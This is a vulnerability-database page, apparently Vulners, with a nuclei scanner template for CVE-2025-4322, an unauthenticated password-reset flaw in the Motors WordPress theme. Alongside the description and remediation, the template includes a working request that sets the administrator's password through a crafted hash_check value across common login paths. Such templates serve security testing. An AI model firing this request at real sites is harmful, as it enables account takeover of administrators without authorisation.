Lucene search
+L

Motors <= 5.6.67 - Unauthenticated Privilege Escalation via Password Update/Account Takeover

🗓️ 07 Sep 2026 06:34:52Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 127 Views

Motors theme versions up to 5.6.67 allows unauthorized password updates and account takeover.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2025-4322
23 Jun 202521:08
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2025-4322
22 May 202515:12
githubexploit
circl
Circl
CVE-2025-4322
20 May 202506:39
circl
cnnvd
CNNVD
WordPress plugin Motors 安全漏洞
20 May 202500:00
cnnvd
cve
CVE
CVE-2025-4322
20 May 202505:30
cve
cvelist
Cvelist
CVE-2025-4322 Motors <= 5.6.67 - Unauthenticated Privilege Escalation via Password Update/Account Takeover
20 May 202505:30
cvelist
kitploit
Kitploit
Blackash-CVE-2025-4322
7 Sep 202611:26
kitploit
kitploit
Kitploit
CVE-2025-4322-Exploit
2 Sep 202610:28
kitploit
kitploit
Kitploit
CVE-2025-4322
7 Sep 202602:25
kitploit
kitploit
Kitploit
WP-CVE-2025-4322---Scan
6 Sep 202623:27
kitploit
Rows per page
id: CVE-2025-4322

info:
  name: Motors <= 5.6.67 - Unauthenticated Privilege Escalation via Password Update/Account Takeover
  author: DhiyaneshDK
  severity: critical
  description: |
    The Motors theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.6.67. This is due to the theme not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user passwords, including those of administrators, and leverage that to gain access to their account.
  impact: |
    Unauthenticated attackers can change arbitrary user passwords including administrators through insufficient identity validation, enabling complete site takeover and unauthorized access to all accounts.
  remediation: |
    Upgrade Motors WordPress theme to version 5.6.68 or later that properly validates user identity before password changes.
  reference:
    - http://themeforest.net/item/motors-car-dealership-wordpress-theme/13987211
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/61820ca5-5548-4155-b350-df3db1bc1661?source=cve
    - https://github.com/Yucaerin/CVE-2025-4322
    - https://github.com/maximo896/CVE-2025-4322
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-4322
    cwe-id: CWE-620
    epss-score: 0.15647
    epss-percentile: 0.96616
  metadata:
    fofa-query: body="/wp-content/themes/motors/style.css"
  tags: cve,cve2025,motor,intrusive,wordpress,wp-theme,wp,vkev,vuln

variables:
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        POST {{paths}}/?user_id=1&hash_check=%25C0 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        stm_new_password={{password}}

    payloads:
      paths:
        - "/login"
        - "/loginregister"
        - "/login-register"
        - "/my-account"
        - "/account"
        - "/signin"
        - "/sign-in"
        - "/register"
        - "/auth"
        - "/user/login"
        - "/user/signin"
        - "/forgot-password"
        - "/reset-password"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Enter new password","stm-validation-message")'
        condition: and
# digest: 4b0a00483046022100f0f190d839dec72cacd321fe11c09bd1df1b17251181998a27a1cedfc98d6a1f022100e7574332a01e8e1784a4b00a34c8f0829ddcfa9e89bead3529dfe9d07745e36f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.8
EPSS0.15647
SSVC
127